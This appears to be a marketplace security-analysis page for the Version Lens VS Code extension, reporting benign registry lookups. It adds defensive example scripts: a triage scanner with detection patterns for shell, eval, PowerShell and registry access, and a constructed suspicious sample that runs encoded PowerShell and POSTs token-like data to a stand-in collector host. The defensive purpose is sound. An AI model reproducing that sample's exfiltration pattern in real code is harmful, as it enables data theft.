Findings
Code analysis
AI-powered analysis of the extension's source code for security insights and risk assessment.
Version Lens is a Visual Studio Code extension that displays the latest available versions for dependencies in various package manager files using code lens annotations. Its primary intention is to help developers keep their dependencies up to date by showing version suggestions inline in the editor.
Key Behaviors and API Usage
- VSCode API Usage: The extension registers multiple commands, code lens providers, and event listeners for editor and workspace events (e.g., file changes, saves, active editor changes).
- Network Activity: The extension fetches package version information from remote registries (npm, PyPI, Maven, etc.) using HTTP requests. This is handled through HTTP client abstractions and is limited to querying public package registries.
- Filesystem Activity: Reads package files (e.g., package.json, pyproject.toml) to parse dependencies. It also reads its own extension package.json for versioning.
- No Arbitrary Code Execution: There is no evidence of shell, PowerShell, or arbitrary code execution. The extension does not spawn processes except for executing VSCode tasks explicitly configured by the user.
- No Registry or User Manipulation: There is no access to the Windows registry, user account creation, or clipboard access.
- Persistence: The extension does not implement persistence mechanisms outside of standard VSCode extension activation.
- No Obfuscation: The code is bundled and minified for distribution but not obfuscated. Variable names are shortened, but logic is readable and not intentionally hidden.
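The behaviors listed above are the kind of thing a static triage pass looks for: process creation, dynamic code evaluation, registry or clipboard access, the set of hosts the code contacts, and whether the bundle is merely minified or actually obfuscated. The script below is an added example of such a pass, not code from this page or from Version Lens; the indicator patterns, the escaped-literal obfuscation heuristic, the registry allowlist and both input samples are constructed assumptions for illustration.

```javascript
// Added example, not Version Lens code: a static triage pass of the kind the
// findings above summarise. The indicator patterns, the obfuscation heuristic
// and both input samples are constructed assumptions for illustration.

const INDICATORS = {
  // process creation and dynamic code evaluation
  codeExecution: [/\bchild_process\b/, /\beval\s*\(/, /\bnew\s+Function\s*\(/, /\bvm\.runIn\w+\s*\(/],
  // shell / PowerShell use (exec( also matches RegExp.prototype.exec, so treat hits as leads, not proof)
  shell: [/\b(spawn|exec|execFile)(Sync)?\s*\(/, /\bpowershell(\.exe)?\b/i, /\bcmd\.exe\b/i],
  // Windows registry and local account manipulation
  registryOrUser: [/\bwinreg\b/, /HKEY_(LOCAL_MACHINE|CURRENT_USER)/, /\bnet\s+user\b/i],
  clipboard: [/\bclipboard\b/],
};

const URL_RE = /https?:\/\/[A-Za-z0-9.-]+(?::\d+)?/g;

// Every host the source can talk to, so endpoints outside the expected registries stand out.
function collectUrlHosts(src) {
  const hosts = new Set();
  for (const m of src.matchAll(URL_RE)) hosts.add(new URL(m[0]).host);
  return [...hosts].sort();
}

// Minified code has short identifiers but few escaped string literals; a high
// share of \xNN / \uNNNN escapes per string literal is a simple obfuscation tell.
function escapedLiteralRatio(src) {
  const escapes = (src.match(/\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}/g) || []).length;
  const literals = Math.max(1, Math.floor((src.match(/["'`]/g) || []).length / 2));
  return escapes / literals;
}

function scanExtensionSource(src, allowedHosts) {
  const hits = {};
  for (const [category, patterns] of Object.entries(INDICATORS)) {
    hits[category] = patterns.filter(p => p.test(src)).map(p => p.source);
  }
  const hosts = collectUrlHosts(src);
  return {
    hits,
    hosts,
    unexpectedHosts: hosts.filter(h => !allowedHosts.includes(h)),
    likelyObfuscated: escapedLiteralRatio(src) > 0.5,
  };
}

// Constructed samples (not real extension code). The first mimics a benign
// version-lookup extension; the second is what a compromised bundle might contain.
const REGISTRY_HOSTS = ["registry.npmjs.org", "pypi.org"];
const BENIGN_SAMPLE = `
const vscode = require("vscode");
async function latest(name) {
  const r = await fetch("https://registry.npmjs.org/" + name + "/latest");
  return (await r.json()).version;
}
const raw = await vscode.workspace.fs.readFile(vscode.Uri.file("package.json"));
`;
const SUSPICIOUS_SAMPLE = `
const cp = require("child_process");
cp.spawn("powershell.exe", ["-enc", "\\x41\\x41\\x41\\x41"]);
eval(atob("\\x5a\\x47\\x39\\x6a"));
fetch("https://collector.example.invalid/c", { method: "POST", body: "\\x74\\x6f\\x6b" });
`;

console.log(JSON.stringify(scanExtensionSource(SUSPICIOUS_SAMPLE, REGISTRY_HOSTS), null, 2));
```

Regex indicators are leads, not verdicts: a hit on spawn( or exec( still has to be read in context (here, the VSCode task execution the findings mention), and an empty host list only means no URL literal was found, not that the code never reaches the network.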
Example of Network Request Logic
// Thin JSON wrapper over the extension's HTTP client abstraction: the injected
// transport performs the request, this class parses the response body.
class JsonHttpClient {
  constructor(httpClient) {
    this.httpClient = httpClient;
  }

  request(method, url, query = {}, headers = {}) {
    return this.httpClient.request(method, url, query, headers)
      .then(response => ({
        source: response.source,
        status: response.status,
        // JSON.parse throws on a non-JSON body, so the promise rejects and the caller handles it
        data: JSON.parse(response.data)
      }));
  }
}
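The wrapper above parses whatever the transport hands back. The checks a reviewer would look for around such a client are an explicit registry allowlist, HTTPS only, a status check, a body size cap and a JSON.parse that fails closed rather than crashing the extension host. The class below is an added example of those checks, not code from this page or from Version Lens; the allowlist, the size limit, the offline fake transport and its routes are assumptions for illustration.

```javascript
// Added example, not Version Lens code: a JSON client wrapper with the checks a
// reviewer would want around the page's JsonHttpClient. The allowlist, limits,
// fake transport and routes are assumptions for illustration.

const REGISTRY_ALLOWLIST = ["registry.npmjs.org", "pypi.org", "repo1.maven.org"];
const MAX_BODY_BYTES = 5 * 1024 * 1024;

class SafeJsonHttpClient {
  // httpClient: transport with request(method, url, query, headers) -> Promise<{source, status, data}>
  constructor(httpClient, allowedHosts = REGISTRY_ALLOWLIST) {
    this.httpClient = httpClient;
    this.allowedHosts = new Set(allowedHosts);
  }

  // Refuse anything that is not an https URL to a known public registry.
  assertAllowedUrl(url) {
    let parsed;
    try { parsed = new URL(url); } catch { throw new Error(`malformed url: ${url}`); }
    if (parsed.protocol !== "https:") throw new Error(`refusing non-https request to ${parsed.host}`);
    if (!this.allowedHosts.has(parsed.hostname)) throw new Error(`host not in registry allowlist: ${parsed.hostname}`);
    return parsed;
  }

  async request(method, url, query = {}, headers = {}) {
    this.assertAllowedUrl(url);
    const response = await this.httpClient.request(method, url, query, headers);
    if (response.status < 200 || response.status >= 300) {
      throw new Error(`registry returned HTTP ${response.status}`);
    }
    if (Buffer.byteLength(response.data, "utf8") > MAX_BODY_BYTES) {
      throw new Error("response body exceeds size limit");
    }
    let data;
    try { data = JSON.parse(response.data); } catch { throw new Error("registry returned non-JSON body"); }
    if (data === null || typeof data !== "object") throw new Error("unexpected JSON shape");
    return { source: response.source, status: response.status, data };
  }
}

// Constructed offline transport standing in for the real HTTP layer.
const fakeTransport = {
  async request(method, url) {
    const routes = {
      "https://registry.npmjs.org/left-pad/latest": { status: 200, data: '{"version":"1.3.0"}' },
      "https://registry.npmjs.org/broken/latest": { status: 200, data: "<html>maintenance</html>" },
    };
    return { source: "fake", ...(routes[url] || { status: 404, data: "{}" }) };
  },
};

// Exercise the happy path and each rejection reason; returns a map of url -> outcome.
async function demo() {
  const client = new SafeJsonHttpClient(fakeTransport);
  const ok = await client.request("GET", "https://registry.npmjs.org/left-pad/latest");
  const outcomes = { ok: ok.data.version };
  const probes = [
    "https://registry.npmjs.org/broken/latest",        // non-JSON body
    "http://registry.npmjs.org/left-pad/latest",       // plaintext transport
    "https://collector.example.invalid/x",             // host outside the allowlist
    "https://registry.npmjs.org/nonexistent/latest",   // 404 from the registry
  ];
  for (const url of probes) {
    try { await client.request("GET", url); outcomes[url] = "accepted"; }
    catch (e) { outcomes[url] = e.message; }
  }
  return outcomes;
}

demo().then(r => console.log(r));
```

The allowlist check runs before the transport is touched, so a tampered provider config pointing at an attacker host fails without a single request leaving the editor; the size cap and JSON shape check keep a malicious or broken registry from exhausting memory or feeding the parser something the code downstream does not expect.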
Example of CodeLens Provider Registration
// Registers this object as the code lens provider for the package files the
// suggestion provider is configured to match (package.json, pyproject.toml, ...).
this.disposable = vscode.languages.registerCodeLensProvider(
  suggestionProvider.config.fileMatcher,
  this
);
Example of Command Registration
// Registers the handler that runs when the user clicks an "update dependency" code lens.
this.disposable = vscode.commands.registerCommand(
  SuggestionCommandContributions.OnUpdateDependencyClick,
  this.execute,
  this
);
No strong indicators of malicious activity were observed.
API Calls
API calls detected through static analysis of the source code.
Secrets
Any encoded/decoded secrets we managed to find in the source code, git repository, or related files.
Vulnerabilities
Known vulnerabilities and security issues detected in the extension's dependencies and code.
External communication
Any identifiers we detected that may indicate external communication from the item's code.
Dependencies
Dependencies and third-party libraries used by the extension, including version information and license details.
Licenses & Compliance
Compliance
Compliance status and certifications for the extension and its publisher